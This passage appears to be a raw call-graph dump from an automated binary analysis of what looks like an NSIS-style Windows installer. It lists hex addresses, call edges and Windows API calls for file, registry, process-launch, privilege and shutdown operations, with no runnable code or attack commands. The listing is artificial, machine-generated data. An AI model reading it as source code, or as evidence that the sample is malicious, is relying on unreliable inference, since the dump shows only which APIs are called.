405c82 4 API calls 4216->4218 4217->4213 4221 405c30 2 API calls 4217->4221 4223 4049da 4217->4223 4219 40498f GetDiskFreeSpaceA 4218->4219 4222 4049b3 MulDiv 4219->4222 4219->4223 4221->4217 4222->4223 4224 404a4b 4223->4224 4226 404be2 20 API calls 4223->4226 4225 404a6e 4224->4225 4227 40140b 2 API calls 4224->4227 4241 4042f6 KiUserCallbackDispatcher 4225->4241 4228 404a38 4226->4228 4227->4225 4230 404a4d SetDlgItemTextA 4228->4230 4231 404a3d 4228->4231 4230->4224 4233 404b1d 20 API calls 4231->4233 4232 404a8a 4232->4234 4242 4046bf 4232->4242 4233->4224 4234->4190 4236->4181 4237->4206 4238->4189 4239->4208 4240->4216 4241->4232 4243 4046d2 SendMessageA 4242->4243 4244 4046cd 4242->4244 4243->4234 4244->4243 4245 402766 4246 40276c 4245->4246 4247 402774 FindClose 4246->4247 4248 402ac5 4246->4248 4247->4248 4249 4023e8 4250 402c39 17 API calls 4249->4250 4251 4023f9 4250->4251 4252 402c39 17 API calls 4251->4252 4253 402402 4252->4253 4254 402c39 17 API calls 4253->4254 4255 40240c GetPrivateProfileStringA 4254->4255 4256 40166a 4257 402c39 17 API calls 4256->4257 4258 401671 4257->4258 4259 402c39 17 API calls 4258->4259 4260 40167a 4259->4260 4261 402c39 17 API calls 4260->4261 4262 401683 MoveFileA 4261->4262 4263 401696 4262->4263 4264 40168f 4262->4264 4265 4065ce 2 API calls 4263->4265 4268 4022ea 4263->4268 4266 401423 24 API calls 4264->4266 4267 4016a5 4265->4267 4266->4268 4267->4268 4269 406030 36 API calls 4267->4269 4269->4264 4270 4052ec 4271 405310 4270->4271 4272 4052fc 4270->4272 4274 405318 IsWindowVisible 4271->4274 4278 40532f 4271->4278 4273 405302 4272->4273 4282 405359 4272->4282 4276 404320 SendMessageA 4273->4276 4277 405325 4274->4277 4274->4282 4275 40535e CallWindowProcA 4279 40530c 4275->4279 4276->4279 4280 404c27 5 API calls 4277->4280 4278->4275 4281 404ca7 4 API calls 4278->4281 4280->4278 4281->4282 4282->4275 4283 6eac1000 4284 6eac1096 71 API calls 4283->4284 4285 6eac102b 4284->4285 4286 4019ed 4287 402c39 17 API calls 4286->4287 4288 4019f4 4287->4288 4289 402c39 17 API calls 4288->4289 4290 4019fd 4289->4290 4291 401a04 lstrcmpiA 4290->4291 4292 401a16 lstrcmpA 4290->4292 4293 401a0a 4291->4293 4292->4293 3235 40156f 3236 401586 3235->3236 3237 40157f ShowWindow 3235->3237 3238 401594 ShowWindow 3236->3238 3239 402ac5 3236->3239 3237->3236 3238->3239 3373 402173 3374 402c39 17 API calls 3373->3374 3375 40217a 3374->3375 3376 402c39 17 API calls 3375->3376 3377 402184 3376->3377 3378 402c39 17 API calls 3377->3378 3379 40218e 3378->3379 3380 402c39 17 API calls 3379->3380 3381 40219b 3380->3381 3382 402c39 17 API calls 3381->3382 3383 4021a5 3382->3383 3384 4021e7 CoCreateInstance 3383->3384 3385 402c39 17 API calls 3383->3385 3388 402206 3384->3388 3390 4022b4 3384->3390 3385->3384 3386 401423 24 API calls 3387 4022ea 3386->3387 3389 402294 MultiByteToWideChar 3388->3389 3388->3390 3389->3390 3390->3386 3390->3387 4294 4022f3 4295 402c39 17 API calls 4294->4295 4296 4022f9 4295->4296 4297 402c39 17 API calls 4296->4297 4298 402302 4297->4298 4299 402c39 17 API calls 4298->4299 4300 40230b 4299->4300 4301 4065ce 2 API calls 4300->4301 4302 402314 4301->4302 4303 402325 lstrlenA lstrlenA 4302->4303 4307 402318 4302->4307 4305 405378 24 API calls 4303->4305 4304 405378 24 API calls 4308 402320 4304->4308 4306 402361 SHFileOperationA 4305->4306 4306->4307 4306->4308 4307->4304 4307->4308 4309 4014f4 SetForegroundWindow 4310 402ac5 4309->4310 4311 402375 4312 40238f 4311->4312 4313 40237c 4311->4313 4314 4062ea 17 API calls 4313->4314 4315 402389 4314->4315 4316 40596d MessageBoxIndirectA 4315->4316 4316->4312 4317 402675 4318 402c17 17 API calls 4317->4318 4322 40267f 4318->4322 4319 4026ed 4320 405e62 ReadFile 4320->4322 4321 4026ef 4326 4061b5 wsprintfA 4321->4326 4322->4319 4322->4320 4322->4321 4323 4026ff 4322->4323 4323->4319 4325 402715 SetFilePointer 4323->4325 4325->4319 4326->4319 4327 4029f6 4328 402a49 4327->4328 4329 4029fd 4327->4329 4330 406663 5 API calls 4328->4330 4331 402c17 17 API calls 4329->4331 4334 402a47 4329->4334 4332 402a50 4330->4332 4333 402a0b 4331->4333 4335 402c39 17 API calls 4332->4335 4336 402c17 17 API calls 4333->4336 4337 402a59 4335->4337 4339 402a1a 4336->4339 4337->4334 4345 4062aa 4337->4345 4344 4061b5 wsprintfA 4339->4344 4341 402a67 4341->4334 4349 406294 4341->4349 4344->4334 4346 4062b5 4345->4346 4347 4062d8 IIDFromString 4346->4347 4348 4062d1 4346->4348 4347->4341 4348->4341 4352 406279 WideCharToMultiByte 4349->4352 4351 402a88 CoTaskMemFree 4351->4334 4352->4351 4353 401ef9 4354 402c39 17 API calls 4353->4354 4355 401eff 4354->4355 4356 402c39 17 API calls 4355->4356 4357 401f08 4356->4357 4358 402c39 17 API calls 4357->4358 4359 401f11 4358->4359 4360 402c39 17 API calls 4359->4360 4361 401f1a 4360->4361 4362 401423 24 API calls 4361->4362 4363 401f21 4362->4363 4370 405933 ShellExecuteExA 4363->4370 4365 401f5c 4367 4027c8 4365->4367 4371 4066d8 WaitForSingleObject 4365->4371 4368 401f76 CloseHandle 4368->4367 4370->4365 4372 4066f2 4371->4372 4373 406704 GetExitCodeProcess 4372->4373 4374 40669f 2 API calls 4372->4374 4373->4368 4375 4066f9 WaitForSingleObject 4374->4375 4375->4372 4376 401f7b 4377 402c39 17 API calls 4376->4377 4378 401f81 4377->4378 4379 405378 24 API calls 4378->4379 4380 401f8b 4379->4380 4381 4058f0 2 API calls 4380->4381 4382 401f91 4381->4382 4383 401fb2 CloseHandle 4382->4383 4384 4027c8 4382->4384 4385 4066d8 5 API calls 4382->4385 4383->4384 4387 401fa6 4385->4387 4387->4383 4389 4061b5 wsprintfA 4387->4389 4389->4383 4390 401ffb 4391 402c39 17 API calls 4390->4391 4392 402002 4391->4392 4393 406663 5 API calls 4392->4393 4394 402011 4393->4394 4395 402099 4394->4395 4396 402029 GlobalAlloc 4394->4396 4396->4395 4397 40203d 4396->4397 4398 406663 5 API calls 4397->4398 4399 402044 4398->4399 4400 406663 5 API calls 4399->4400 4401 40204e 4400->4401 4401->4395 4405 4061b5 wsprintfA 4401->4405 4403 402089 4406 4061b5 wsprintfA 4403->4406 4405->4403 4406->4395 4407 4039fb 4408 403a06 4407->4408 4409 403a0a 4408->4409 4410 403a0d GlobalAlloc 4408->4410 4410->4409 4411 4018fd 4412 401934 4411->4412 4413 402c39 17 API calls 4412->4413 4414 401939 4413->4414 4415 405a19 67 API calls 4414->4415 4416 401942 4415->4416 4417 40247e 4418 402c39 17 API calls 4417->4418 4419 402490 4418->4419 4420 402c39 17 API calls 4419->4420 4421 40249a 4420->4421 4434 402cc9 4421->4434 4424 402ac5 4425 4024cf 4428 402c17 17 API calls 4425->4428 4430 4024db 4425->4430 4426 402c39 17 API calls 4427 4024c8 lstrlenA 4426->4427 4427->4425 4428->4430 4429 4024fd RegSetValueExA 4432 402513 RegCloseKey 4429->4432 4430->4429 4431 403143 31 API calls 4430->4431 4431->4429 4432->4424 4435 402ce4 4434->4435 4438 40610b 4435->4438 4439 40611a 4438->4439 4440 4024aa 4439->4440 4441 406125 RegCreateKeyExA 4439->4441 4440->4424 4440->4425 4440->4426 4441->4440 4442 401cfe 4443 402c17 17 API calls 4442->4443 4444 401d04 IsWindow 4443->4444 4445 401a0e 4444->4445 4446 401000 4447 401037 BeginPaint GetClientRect 4446->4447 4448 40100c DefWindowProcA 4446->4448 4450 4010f3 4447->4450 4451 401179 4448->4451 4452 401073 CreateBrushIndirect FillRect DeleteObject 4450->4452 4453 4010fc 4450->4453 4452->4450 4454 401102 CreateFontIndirectA 4453->4454 4455 401167 EndPaint 4453->4455 4454->4455 4456 401112 6 API calls 4454->4456 4455->4451 4456->4455 4457 401900 4458 402c39 17 API calls 4457->4458 4459 401907 4458->4459 4460 40596d MessageBoxIndirectA 4459->4460 4461 401910 4460->4461 4462 402780 4463 402786 4462->4463 4464 40278a FindNextFileA 4463->4464 4467 40279c 4463->4467 4465 4027db 4464->4465 4464->4467 4468 406257 lstrcpynA 4465->4468 4468->4467 4469 401502 4470 40150a 4469->4470 4472 40151d 4469->4472 4471 402c17 17 API calls 4470->4471 4471->4472 4473 401b87 4474 401b94 4473->4474 4475 401bd8 4473->4475 4480 401c1c 4474->4480 4481 401bab 4474->4481 4476 401c01 GlobalAlloc 4475->4476 4479 401bdc 4475->4479 4477 4062ea 17 API calls 4476->4477 4477->4480 4478 4062ea 17 API calls 4482 402389 4478->4482 4488 40238f 4479->4488 4494 406257 lstrcpynA 4479->4494 4480->4478 4480->4488 4492 406257 lstrcpynA 4481->4492 4486 40596d MessageBoxIndirectA 4482->4486 4485 401bee GlobalFree 4485->4488 4486->4488 4487 401bba 4493 406257 lstrcpynA 4487->4493 4490 401bc9 4495 406257 lstrcpynA 4490->4495 4492->4487 4493->4490 4494->4485 4495->4488 4496 40440a lstrcpynA lstrlenA 4497 40298a 4498 402c17 17 API calls 4497->4498 4499 402990 4498->4499 4500 4027c8 4499->4500 4501 4062ea 17 API calls 4499->4501 4501->4500 4502 40260c 4503 402c39 17 API calls 4502->4503 4504 402613 4503->4504 4507 405dea GetFileAttributesA CreateFileA 4504->4507 4506 40261f 4507->4506 4508 401490 4509 405378 24 API calls 4508->4509 4510 401497 4509->4510 4511 402590 4512 402c79 17 API calls 4511->4512 4513 40259a 4512->4513 4514 402c17 17 API calls 4513->4514 4515 4025a3 4514->4515 4516 4025ca RegEnumValueA 4515->4516 4517 4025be RegEnumKeyA 4515->4517 4519 4027c8 4515->4519 4518 4025df RegCloseKey 4516->4518 4517->4518 4518->4519 4521 40149d 4522 4014ab PostQuitMessage 4521->4522 4523 40238f 4521->4523 4522->4523 4524 40159d 4525 402c39 17 API calls 4524->4525 4526 4015a4 SetFileAttributesA 4525->4526 4527 4015b6 4526->4527 3997 40251e 3998 402c79 17 API calls 3997->3998 3999 402528 3998->3999 4000 402c39 17 API calls 3999->4000 4001 402531 4000->4001 4002 4027c8 4001->4002 4003 40253b RegQueryValueExA 4001->4003 4004 40255b 4003->4004 4007 402561 RegCloseKey 4003->4007 4004->4007 4008 4061b5 wsprintfA 4004->4008 4007->4002 4008->4007 4528 401a1e 4529 402c39 17 API calls 4528->4529 4530 401a27 ExpandEnvironmentStringsA 4529->4530 4531 401a3b 4530->4531 4532 401a4e 4530->4532 4531->4532 4533 401a40 lstrcmpA 4531->4533 4533->4532 4539 40471f 4540 404755 4539->4540 4541 40472f 4539->4541 4542 40433b 8 API calls 4540->4542 4543 4042d4 18 API calls 4541->4543 4544 404761 4542->4544 4545 40473c SetDlgItemTextA 4543->4545 4545->4540 4546 40171f 4547 402c39 17 API calls 4546->4547 4548 401726 SearchPathA 4547->4548 4549 401741 4548->4549 4550 401d1f 4551 402c17 17 API calls 4550->4551 4552 401d26 4551->4552 4553 402c17 17 API calls 4552->4553 4554 401d32 GetDlgItem 4553->4554 4555 402628 4554->4555 4556 4023a4 4557 4023b2 4556->4557 4558 4023ac 4556->4558 4560 402c39 17 API calls 4557->4560 4561 4023c2 4557->4561 4559 402c39 17 API calls 4558->4559 4559->4557 4560->4561 4562 402c39 17 API calls 4561->4562 4565 4023d0 4561->4565 4562->4565 4563 402c39 17 API calls 4564 4023d9 WritePrivateProfileStringA 4563->4564 4565->4563 3077 4020a5 3078 4020b7 3077->3078 3079 402165 3077->3079 3095 402c39 3078->3095 3082 401423 24 API calls 3079->3082 3087 4022ea 3082->3087 3083 402c39 17 API calls 3084 4020c7 3083->3084 3085 4020dc LoadLibraryExA 3084->3085 3086 4020cf GetModuleHandleA 3084->3086 3085->3079 3088 4020ec GetProcAddress 3085->3088 3086->3085 3086->3088 3089 402138 3088->3089 3090 4020fb 3088->3090 3104 405378 3089->3104 3092 40210b 3090->3092 3101 401423 3090->3101 3092->3087 3094 402159 FreeLibrary 3092->3094 3094->3087 3096 402c45 3095->3096 3115 4062ea 3096->3115 3099 4020be 3099->3083 3102 405378 24 API calls 3101->3102 3103 401431 3102->3103 3103->3092 3105 405436 3104->3105 3106 405393 3104->3106 3105->3092 3107 4053b0 lstrlenA 3106->3107 3108 4062ea 17 API calls 3106->3108 3109 4053d9 3107->3109 3110 4053be lstrlenA 3107->3110 3108->3107 3112 4053ec 3109->3112 3113 4053df SetWindowTextA 3109->3113 3110->3105 3111 4053d0 lstrcatA 3110->3111 3111->3109 3112->3105 3114 4053f2 SendMessageA SendMessageA SendMessageA 3112->3114 3113->3112 3114->3105 3120 4062f7 3115->3120 3116 40651c 3117 402c66 3116->3117 3148 406257 lstrcpynA 3116->3148 3117->3099 3132 406535 3117->3132 3119 4064f6 lstrlenA 3119->3120 3120->3116 3120->3119 3122 4062ea 10 API calls 3120->3122 3125 406412 GetSystemDirectoryA 3120->3125 3126 406425 GetWindowsDirectoryA 3120->3126 3127 406535 5 API calls 3120->3127 3128 4062ea 10 API calls 3120->3128 3129 40649f lstrcatA 3120->3129 3130 406459 SHGetSpecialFolderLocation 3120->3130 3141 40613e 3120->3141 3146 4061b5 wsprintfA 3120->3146 3147 406257 lstrcpynA 3120->3147 3122->3119 3125->3120 3126->3120 3127->3120 3128->3120 3129->3120 3130->3120 3131 406471 SHGetPathFromIDListA CoTaskMemFree 3130->3131 3131->3120 3139 406541 3132->3139 3133 4065ad CharPrevA 3136 4065a9 3133->3136 3134 40659e CharNextA 3134->3136 3134->3139 3136->3133 3137 4065c8 3136->3137 3137->3099 3138 40658c CharNextA 3138->3139 3139->3134 3139->3136 3139->3138 3140 406599 CharNextA 3139->3140 3153 405c14 3139->3153 3140->3134 3149 4060dd 3141->3149 3144 406172 RegQueryValueExA RegCloseKey 3145 4061a1 3144->3145 3145->3120 3146->3120 3147->3120 3148->3117 3150 4060ec 3149->3150 3151 4060f0 3150->3151 3152 4060f5 RegOpenKeyExA 3150->3152 3151->3144 3151->3145 3152->3151 3154 405c1a 3153->3154 3155 405c2d 3154->3155 3156 405c20 CharNextA 3154->3156 3155->3139 3156->3154 4566 402e25 4567 402e34 SetTimer 4566->4567 4568 402e4d 4566->4568 4567->4568 4569 402ea2 4568->4569 4570 402e67 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4568->4570 4570->4569 3167 402429 3168 402430 3167->3168 3169 40245b 3167->3169 3179 402c79 3168->3179 3171 402c39 17 API calls 3169->3171 3173 402462 3171->3173 3184 402cf7 3173->3184 3174 402441 3176 402c39 17 API calls 3174->3176 3177 402448 RegDeleteValueA RegCloseKey 3176->3177 3178 40246f 3177->3178 3180 402c39 17 API calls 3179->3180 3181 402c90 3180->3181 3182 4060dd RegOpenKeyExA 3181->3182 3183 402437 3182->3183 3183->3174 3183->3178 3185 402d03 3184->3185 3186 402d0a 3184->3186 3185->3178 3186->3185 3188 402d3b 3186->3188 3189 4060dd RegOpenKeyExA 3188->3189 3190 402d69 3189->3190 3191 402d79 RegEnumValueA 3190->3191 3198 402d9c 3190->3198 3199 402e13 3190->3199 3192 402e03 RegCloseKey 3191->3192 3191->3198 3192->3199 3193 402dd8 RegEnumKeyA 3194 402de1 RegCloseKey 3193->3194 3193->3198 3201 406663 GetModuleHandleA 3194->3201 3196 402d3b 6 API calls 3196->3198 3198->3192 3198->3193 3198->3194 3198->3196 3199->3185 3200 402df5 RegDeleteKeyA 3200->3199 3202 406689 GetProcAddress 3201->3202 3203 40667f 3201->3203 3205 402df1 3202->3205 3207 4065f5 GetSystemDirectoryA 3203->3207 3205->3199 3205->3200 3206 406685 3206->3202 3206->3205 3208 406617 wsprintfA LoadLibraryExA 3207->3208 3208->3206 4571 4027aa 4572 402c39 17 API calls 4571->4572 4573 4027b1 FindFirstFileA 4572->4573 4574 4027d4 4573->4574 4578 4027c4 4573->4578 4575 4027db 4574->4575 4579 4061b5 wsprintfA 4574->4579 4580 406257 lstrcpynA 4575->4580 4579->4575 4580->4578 3210 401c2e 3232 402c17 3210->3232 3212 401c35 3213 402c17 17 API calls 3212->3213 3214 401c42 3213->3214 3215 401c57 3214->3215 3216 402c39 17 API calls 3214->3216 3217 402c39 17 API calls 3215->3217 3221 401c67 3215->3221 3216->3215 3217->3221 3218 401c72 3222 402c17 17 API calls 3218->3222 3219 401cbe 3220 402c39 17 API calls 3219->3220 3223 401cc3 3220->3223 3221->3218 3221->3219 3224 401c77 3222->3224 3225 402c39 17 API calls 3223->3225 3226 402c17 17 API calls 3224->3226 3227 401ccc FindWindowExA 3225->3227 3228 401c83 3226->3228 3231 401cea 3227->3231 3229 401c90 SendMessageTimeoutA 3228->3229 3230 401cae SendMessageA 3228->3230 3229->3231 3230->3231 3233 4062ea 17 API calls 3232->3233 3234 402c2c 3233->3234 3234->3212 4581 40262e 4582 402633 4581->4582 4583 402647 4581->4583 4585 402c17 17 API calls 4582->4585 4584 402c39 17 API calls 4583->4584 4586 40264e lstrlenA 4584->4586 4587 40263c 4585->4587 4586->4587 4588 405e91 WriteFile 4587->4588 4589 402670 4587->4589 4588->4589 3240 401932 3241 401934 3240->3241 3242 402c39 17 API calls 3241->3242 3243 401939 3242->3243 3246 405a19 3243->3246 3287 405cd7 3246->3287 3249 405a41 DeleteFileA 3251 401942 3249->3251 3250 405a58 3252 405b90 3250->3252 3301 406257 lstrcpynA 3250->3301 3252->3251 3319 4065ce FindFirstFileA 3252->3319 3254 405a7e 3255 405a91 3254->3255 3256 405a84 lstrcatA 3254->3256 3302 405c30 lstrlenA 3255->3302 3258 405a97 3256->3258 3261 405aa5 lstrcatA 3258->3261 3262 405a9c 3258->3262 3264 405ab0 lstrlenA FindFirstFileA 3261->3264 3262->3261 3262->3264 3263 405bae 3322 405be9 lstrlenA CharPrevA 3263->3322 3265 405b86 3264->3265 3285 405ad4 3264->3285 3265->3252 3267 405c14 CharNextA 3267->3285 3269 4059d1 5 API calls 3270 405bc0 3269->3270 3271 405bc4 3270->3271 3272 405bda 3270->3272 3271->3251 3277 405378 24 API calls 3271->3277 3273 405378 24 API calls 3272->3273 3273->3251 3274 405b65 FindNextFileA 3276 405b7d FindClose 3274->3276 3274->3285 3276->3265 3278 405bd1 3277->3278 3280 406030 36 API calls 3278->3280 3281 405bd8 3280->3281 3281->3251 3282 405a19 60 API calls 3282->3285 3283 405378 24 API calls 3283->3274 3284 405378 24 API calls 3284->3285 3285->3267 3285->3274 3285->3282 3285->3283 3285->3284 3306 406257 lstrcpynA 3285->3306 3307 4059d1 3285->3307 3315 406030 MoveFileExA 3285->3315 3325 406257 lstrcpynA 3287->3325 3289 405ce8 3326 405c82 CharNextA CharNextA 3289->3326 3292 405a39 3292->3249 3292->3250 3293 406535 5 API calls 3299 405cfe 3293->3299 3294 405d29 lstrlenA 3295 405d34 3294->3295 3294->3299 3297 405be9 3 API calls 3295->3297 3296 4065ce 2 API calls 3296->3299 3298 405d39 GetFileAttributesA 3297->3298 3298->3292 3299->3292 3299->3294 3299->3296 3300 405c30 2 API calls 3299->3300 3300->3294 3301->3254 3303 405c3d 3302->3303 3304 405c42 CharPrevA 3303->3304 3305 405c4e 3303->3305 3304->3303 3304->3305 3305->3258 3306->3285 3332 405dc5 GetFileAttributesA 3307->3332 3310 4059fe 3310->3285 3311 4059f4 DeleteFileA 3313 4059fa 3311->3313 3312 4059ec RemoveDirectoryA 3312->3313 3313->3310 3314 405a0a SetFileAttributesA 3313->3314 3314->3310 3316 406051 3315->3316 3317 406044 3315->3317 3316->3285 3335 405ec0 3317->3335 3320 4065e4 FindClose 3319->3320 3321 405baa 3319->3321 3320->3321 3321->3251 3321->3263 3323 405c03 lstrcatA 3322->3323 3324 405bb4 3322->3324 3323->3324 3324->3269 3325->3289 3327 405c9d 3326->3327 3330 405cad 3326->3330 3328 405ca8 CharNextA 3327->3328 3327->3330 3331 405ccd 3328->3331 3329 405c14 CharNextA 3329->3330 3330->3329 3330->3331 3331->3292 3331->3293 3333 4059dd 3332->3333 3334 405dd7 SetFileAttributesA 3332->3334 3333->3310 3333->3311 3333->3312 3334->3333 3336 405ee6 3335->3336 3337 405f0c GetShortPathNameA 3335->3337 3362 405dea GetFileAttributesA CreateFileA 3336->3362 3339 405f21 3337->3339 3340 40602b 3337->3340 3339->3340 3342 405f29 wsprintfA 3339->3342 3340->3316 3341 405ef0 CloseHandle GetShortPathNameA 3341->3340 3343 405f04 3341->3343 3344 4062ea 17 API calls 3342->3344 3343->3337 3343->3340 3345 405f51 3344->3345 3363 405dea GetFileAttributesA CreateFileA 3345->3363 3347 405f5e 3347->3340 3348 405f6d GetFileSize GlobalAlloc 3347->3348 3349 406024 CloseHandle 3348->3349 3350 405f8f 3348->3350 3349->3340 3364 405e62 ReadFile 3350->3364 3355 405fc2 3357 405d4f 4 API calls 3355->3357 3356 405fae lstrcpyA 3358 405fd0 3356->3358 3357->3358 3359 406007 SetFilePointer 3358->3359 3371 405e91 WriteFile 3359->3371 3362->3341 3363->3347 3365 405e80 3364->3365 3365->3349 3366 405d4f lstrlenA 3365->3366 3367 405d90 lstrlenA 3366->3367 3368 405d98 3367->3368 3369 405d69 lstrcmpiA 3367->3369 3368->3355 3368->3356 3369->3368 3370 405d87 CharNextA 3369->3370 3370->3367 3372 405eaf GlobalFree 3371->3372 3372->3349 3391 4033b3 SetErrorMode GetVersionExA 3392 403405 GetVersionExA 3391->3392 3394 403444 3391->3394 3393 403421 3392->3393 3392->3394 3393->3394 3395 4034c8 3394->3395 3396 406663 5 API calls 3394->3396 3397 4065f5 3 API calls 3395->3397 3396->3395 3398 4034de lstrlenA 3397->3398 3398->3395 3399 4034ee 3398->3399 3400 406663 5 API calls 3399->3400 3401 4034f5 3400->3401 3402 406663 5 API calls 3401->3402 3403 4034fc 3402->3403 3404 406663 5 API calls 3403->3404 3405 403508 #17 OleInitialize SHGetFileInfoA 3404->3405 3483 406257 lstrcpynA 3405->3483 3408 403556 GetCommandLineA 3484 406257 lstrcpynA 3408->3484 3410 403568 3411 405c14 CharNextA 3410->3411 3412 40358f CharNextA 3411->3412 3414 40359e 3412->3414 3413 403664 3415 403678 GetTempPathA 3413->3415 3414->3413 3414->3414 3420 405c14 CharNextA 3414->3420 3424 403666 3414->3424 3485 403382 3415->3485 3417 403690 3418 403694 GetWindowsDirectoryA lstrcatA 3417->3418 3419 4036ea DeleteFileA 3417->3419 3421 403382 12 API calls 3418->3421 3495 402f0c GetTickCount GetModuleFileNameA 3419->3495 3420->3414 3423 4036b0 3421->3423 3423->3419 3426 4036b4 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3423->3426 3579 406257 lstrcpynA 3424->3579 3425 4036fd 3427 403792 3425->3427 3430 403782 3425->3430 3434 405c14 CharNextA 3425->3434 3429 403382 12 API calls 3426->3429 3582 403963 3427->3582 3432 4036e2 3429->3432 3523 403a3d 3430->3523 3432->3419 3432->3427 3436 403717 3434->3436 3444 4037c1 3436->3444 3445 40375c 3436->3445 3437 4037ac 3589 40596d 3437->3589 3438 4038cf 3440 4038d7 GetCurrentProcess OpenProcessToken 3438->3440 3441 40394d ExitProcess 3438->3441 3446 40391d 3440->3446 3447 4038ee LookupPrivilegeValueA AdjustTokenPrivileges 3440->3447 3593 4058d8 3444->3593 3448 405cd7 18 API calls 3445->3448 3450 406663 5 API calls 3446->3450 3447->3446 3451 403768 3448->3451 3453 403924 3450->3453 3451->3427 3580 406257 lstrcpynA 3451->3580 3456 403939 ExitWindowsEx 3453->3456 3459 403946 3453->3459 3454 4037e2 lstrcatA lstrcmpiA 3454->3427 3458 4037fe 3454->3458 3455 4037d7 lstrcatA 3455->3454 3456->3441 3456->3459 3461 403803 3458->3461 3462 40380a 3458->3462 3609 40140b 3459->3609 3460 403777 3581 406257 lstrcpynA 3460->3581 3596 40583e CreateDirectoryA 3461->3596 3601 4058bb CreateDirectoryA 3462->3601 3468 40380f SetCurrentDirectoryA 3469 40382a 3468->3469 3470 40381f 3468->3470 3605 406257 lstrcpynA 3469->3605 3604 406257 lstrcpynA 3470->3604 3473 4062ea 17 API calls 3474 40386c DeleteFileA 3473->3474 3475 40387a CopyFileA 3474->3475 3480 403837 3474->3480 3475->3480 3476 4038c3 3477 406030 36 API calls 3476->3477 3477->3427 3478 406030 36 API calls 3478->3480 3479 4062ea 17 API calls 3479->3480 3480->3473 3480->3476 3480->3478 3480->3479 3482 4038ae CloseHandle 3480->3482 3606 4058f0 CreateProcessA 3480->3606 3482->3480 3483->3408 3484->3410 3486 406535 5 API calls 3485->3486 3487 40338e 3486->3487 3488 403398 3487->3488 3489 405be9 3 API calls 3487->3489 3488->3417 3490 4033a0 3489->3490 3491 4058bb 2 API calls 3490->3491 3492 4033a6 3491->3492 3493 405e19 2 API calls 3492->3493 3494 4033b1 3493->3494 3494->3417 3612 405dea GetFileAttributesA CreateFileA 3495->3612 3497 402f4c 3517 402f5c 3497->3517 3613 406257 lstrcpynA 3497->3613 3499 402f72 3500 405c30 2 API calls 3499->3500 3501 402f78 3500->3501 3614 406257 lstrcpynA 3501->3614 3503 402f83 GetFileSize 3504 402f9a 3503->3504 3505 40307d 3503->3505 3504->3505 3510 4030e9 3504->3510 3504->3517 3519 402ea8 6 API calls 3504->3519 3647 403355 3504->3647 3615 402ea8 3505->3615 3507 403086 3509 4030b6 GlobalAlloc 3507->3509 3507->3517 3650 40336b SetFilePointer 3507->3650 3626 40336b SetFilePointer 3509->3626 3514 402ea8 6 API calls 3510->3514 3513 4030d1 3627 403143 3513->3627 3514->3517 3515 40309f 3518 403355 ReadFile 3515->3518 3517->3425 3520 4030aa 3518->3520 3519->3504 3520->3509 3520->3517 3522 40311a SetFilePointer 3522->3517 3524 406663 5 API calls 3523->3524 3525 403a51 3524->3525 3526 403a57 3525->3526 3527 403a69 3525->3527 3671 4061b5 wsprintfA 3526->3671 3528 40613e 3 API calls 3527->3528 3529 403a94 3528->3529 3531 403ab2 lstrcatA 3529->3531 3533 40613e 3 API calls 3529->3533 3532 403a67 3531->3532 3656 403d02 3532->3656 3533->3531 3536 405cd7 18 API calls 3537 403ae4 3536->3537 3538 403b6d 3537->3538 3540 40613e 3 API calls 3537->3540 3539 405cd7 18 API calls 3538->3539 3541 403b73 3539->3541 3542 403b10 3540->3542 3543 403b83 LoadImageA 3541->3543 3544 4062ea 17 API calls 3541->3544 3542->3538 3548 403b2c lstrlenA 3542->3548 3551 405c14 CharNextA 3542->3551 3545 403c29 3543->3545 3546 403baa RegisterClassA 3543->3546 3544->3543 3547 40140b 2 API calls 3545->3547 3549 403be0 SystemParametersInfoA CreateWindowExA 3546->3549 3578 403c33 3546->3578 3550 403c2f 3547->3550 3552 403b60 3548->3552 3553 403b3a lstrcmpiA 3548->3553 3549->3545 3558 403d02 18 API calls 3550->3558 3550->3578 3556 403b2a 3551->3556 3555 405be9 3 API calls 3552->3555 3553->3552 3554 403b4a GetFileAttributesA 3553->3554 3557 403b56 3554->3557 3559 403b66 3555->3559 3556->3548 3557->3552 3560 405c30 2 API calls 3557->3560 3561 403c40 3558->3561 3672 406257 lstrcpynA 3559->3672 3560->3552 3563 403c4c ShowWindow 3561->3563 3564 403ccf 3561->3564 3566 4065f5 3 API calls 3563->3566 3664 40544a OleInitialize 3564->3664 3568 403c64 3566->3568 3567 403cd5 3569 403cf1 3567->3569 3570 403cd9 3567->3570 3571 403c72 GetClassInfoA 3568->3571 3573 4065f5 3 API calls 3568->3573 3572 40140b 2 API calls 3569->3572 3576 40140b 2 API calls 3570->3576 3570->3578 3574 403c86 GetClassInfoA RegisterClassA 3571->3574 3575 403c9c DialogBoxParamA 3571->3575 3572->3578 3573->3571 3574->3575 3577 40140b 2 API calls 3575->3577 3576->3578 3577->3578 3578->3427 3579->3415 3580->3460 3581->3430 3583 40397b 3582->3583 3584 40396d CloseHandle 3582->3584 3684 4039a8 3583->3684 3584->3583 3587 405a19 67 API calls 3588 40379a OleUninitialize 3587->3588 3588->3437 3588->3438 3590 405982 3589->3590 3591 4037b9 ExitProcess 3590->3591 3592 405996 MessageBoxIndirectA 3590->3592 3592->3591 3594 406663 5 API calls 3593->3594 3595 4037c6 lstrcatA 3594->3595 3595->3454 3595->3455 3597 403808 3596->3597 3598 40588f GetLastError 3596->3598 3597->3468 3598->3597 3599 40589e SetFileSecurityA 3598->3599 3599->3597 3600 4058b4 GetLastError 3599->3600 3600->3597 3602 4058cb 3601->3602 3603 4058cf GetLastError 3601->3603 3602->3468 3603->3602 3604->3469 3605->3480 3607 405923 CloseHandle 3606->3607 3608 40592f 3606->3608 3607->3608 3608->3480 3610 401389 2 API calls 3609->3610 3611 401420 3610->3611 3611->3441 3612->3497 3613->3499 3614->3503 3616 402eb1 3615->3616 3617 402ec9 3615->3617 3620 402ec1 3616->3620 3621 402eba DestroyWindow 3616->3621 3618 402ed1 3617->3618 3619 402ed9 GetTickCount 3617->3619 3651 40669f 3618->3651 3623 402ee7 CreateDialogParamA ShowWindow 3619->3623 3624 402f0a 3619->3624 3620->3507 3621->3620 3623->3624 3624->3507 3626->3513 3628 403159 3627->3628 3629 403187 3628->3629 3655 40336b SetFilePointer 3628->3655 3631 403355 ReadFile 3629->3631 3632 403192 3631->3632 3633 4031a4 GetTickCount 3632->3633 3634 4032ee 3632->3634 3636 4030dd 3632->3636 3633->3636 3643 4031f3 3633->3643 3635 403330 3634->3635 3640 4032f2 3634->3640 3638 403355 ReadFile 3635->3638 3636->3517 3636->3522 3637 403355 